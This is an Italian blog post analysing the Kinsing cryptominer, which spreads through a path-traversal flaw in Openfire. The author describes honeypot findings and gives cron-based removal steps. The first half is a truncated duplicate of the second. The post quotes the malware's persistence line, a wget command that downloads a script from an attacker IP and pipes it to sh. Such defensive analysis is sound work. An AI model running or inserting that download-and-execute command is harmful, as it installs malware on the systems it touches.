Se hai avuto almeno una volta un server affetto da una grave vulnerabilità, sicuramente avrai avuto a che fare con questo malware. Negli ultimi tempi, i ricercatori informatici sono focalizzati sul report delle notizie relative ad Openfire, un server Java addetto alla messaggistica affetto da una grave vulnerabilità di tipo "path traversal". L'exploit permette sostanzialmente di accedere al pannello di configurazione del server, e creare un nuovo account amministratore. Quest'account possiede privilegi RWX sui plugin, e questa caratteristica viene sfruttata per caricare ed eseguire in via ultimata codice arbitrario Java sul server.
Come mostrano gli IoT, esistono numerose istanze di Openfire attive in tutto il globo. Inoltre, pare che l'applicazione non si aggiorni automaticamente, limitandosi ad avvisare l'amministratore che è disponibile una nuova versione. L'exploit è stato sfruttato in una percentuale più debole per lanciare un ransomware sconosciuto, che rinomina le estensioni dei file in
Lo stato su Kinsing:
per condurre questa ricerca, ho creato una serie di honeypot con un ambiente unix-like, implementando una versione di Openfire vulnerabile.
Per iniziare, Kinsing è un malware che colpisce esclusivamente i sistemi Unix, focalizzandosi particolarmente sulle Distro Linux più popolari. Questo malware pone particolare attenzione sui vecchi sistemi Ubuntu (parliamo di Ubuntu 16.04 LTS, 18.04 LTS ecc.) dato che queste versioni datate di Linux possiedono note kernel-flaws che consentono di fare anche privesc a root. Cosa fa Kinsing?
Molte guide su Google fanno acqua da tutte le parti nel tentativo di trovare un "fix" al malware. Infatti, nonostante vengano rimosse tutte le istanze dalle cartelle
Step 1. Digitare nel terminal
Step 2. Rimuovere immediatamente questa cron entry, che viene sfruttata da Kinsing per fare persistence, digitando
Step 3. A questo punto è possibile rimuovere tutte le istanze infette di Kinsing dal sistema, senza il crontjob non spawneranno più.
Nessuno è riuscito a scoprire con certezza chi abbia creato Kinsing, ma l'indirizzo IP 185.122.204.197 reperito dai crontab, può suggerire che l'attore risieda in Svezia, come riportato anche da AbuseIPDB https://www.abuseipdb.com/check/185.122.204.197 sembrerebbe che quest'indirizzo IP non abbia colpito me per la prima volta. Nel link potete notare come altri vari ricercatori abbiano segnalato preventivamente l'IP alla blacklist (l'ultima segnalazione inviata da me)
Questo metodo si è proposto l'obiettivo di risolvere l'infezione da Kinsing, che può creare il rischio di "power outage" nel sistema dovuto all'eccessivo impiego della CPU nell'attività di mining. Per prevenire l'infezione, è ovvio e doveroso puntualizzare che bisogna sempre far attenzione a non esporre in WAN istanze di applicazioni fallate, come in questo caso le vecchie versioni di Openfire, o che sono "protette" da credenziali d'accesso deboli. Impostare credenziali d'accesso meno ovvie possibili, e mantenere aggiornate le app, sono la chiave per prevenire la diffusione di ogni tipo di malware.
Come mostrano gli IoT, esistono numerose istanze di Openfire attive in tutto il globo. Inoltre, pare che l'applicazione non si aggiorni automaticamente, limitandosi ad avvisare l'amministratore che è disponibile una nuova versione. L'exploit è stato sfruttato in una percentuale più debole per lanciare un ransomware sconosciuto, che rinomina le estensioni dei file in
.locked1, ma in larga parte per diffondere Kinsing: il miner che rischia di mandare i container in power outage, e di far schizzare le bollette alle stelle. Questi artefatti, stanno causando disastri finanziari a livello globale, e non solo nelle istanze di Openfire vulnerabili: ogni Linux-based OS che espone applicazioni vulnerabile, è infatti suscettibile a questo genere di malware.Lo stato su Kinsing:
per condurre questa ricerca, ho creato una serie di honeypot con un ambiente unix-like, implementando una versione di Openfire vulnerabile.
Per iniziare, Kinsing è un malware che colpisce esclusivamente i sistemi Unix, focalizzandosi particolarmente sulle Distro Linux più popolari. Questo malware pone particolare attenzione sui vecchi sistemi Ubuntu (parliamo di Ubuntu 16.04 LTS, 18.04 LTS ecc.) dato che queste versioni datate di Linux possiedono note kernel-flaws che consentono di fare anche privesc a root. Cosa fa Kinsing?
Molte guide su Google fanno acqua da tutte le parti nel tentativo di trovare un "fix" al malware. Infatti, nonostante vengano rimosse tutte le istanze dalle cartelle
tmp, e /var/tmp il malware continua a replicarsi di continuo, ogni volta con un nome differente, e spawnando un processo secondario chiamato "kdevtmpfsi", imitando un processo legittimo di Linux chiamato "kdevtmpfs". Il segreto della persistenza del malware risiede nei crontab, una funzione che consente di eseguire ogni tot di tempo un comando sull'OS, quindi come rimuovere Kinsing definitivamente?Step 1. Digitare nel terminal
crontab -l, facendolo ci apparirà la seguente stringa #* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1 dove unk.sh ha l'obiettivo di riscaricare il malware da quest'IP con un nome differente ogni volta che viene cancellato dall'OS. Lo script era in esecuzione sotto l'user "openfire" dimostrando che l'attaccante non ha effettuato privesc, limitandosi ad aggiungere il cronjob dopo aver appena sfruttato la falla di Openfire.Step 2. Rimuovere immediatamente questa cron entry, che viene sfruttata da Kinsing per fare persistence, digitando
crontab -rStep 3. A questo punto è possibile rimuovere tutte le istanze infette di Kinsing dal sistema, senza il crontjob non spawneranno più.
Nessuno è riuscito a scoprire con certezza chi abbia creato Kinsing, ma l'indirizzo IP 185.122.204.197 reperito dai crontab, può suggerire che l'attore risieda in Svezia, come riportato anche da AbuseIPDB https://www.abuseipdb.com/check/185.122.204.197 sembrerebbe che quest'indirizzo IP non abbia colpito me per la prima volta. Nel link potete notare come altri vari ricercatori abbiano segnalato preventivamente l'IP alla blacklist (l'ultima segnalazione inviata da me)
Questo metodo si è proposto l'obiettivo di risolvere l'infezione da Kinsing, che può creare il rischio di "power outage" nel sistema dovuto all'eccessivo impiego della CPU nell'attività di mining. Per prevenire l'infezione, è ovvio e doveroso puntualizzare che bisogna sempre far attenzione a non esporre in WAN istanze di applicazioni fallate, come in questo caso le vecchie versioni di Openfire, o che sono "protette" da credenziali d'accesso deboli. Impostare credenziali d'accesso meno ovvie possibili, e mantenere aggiornate le app, sono la chiave per prevenire la diffusione di ogni tipo di malware.
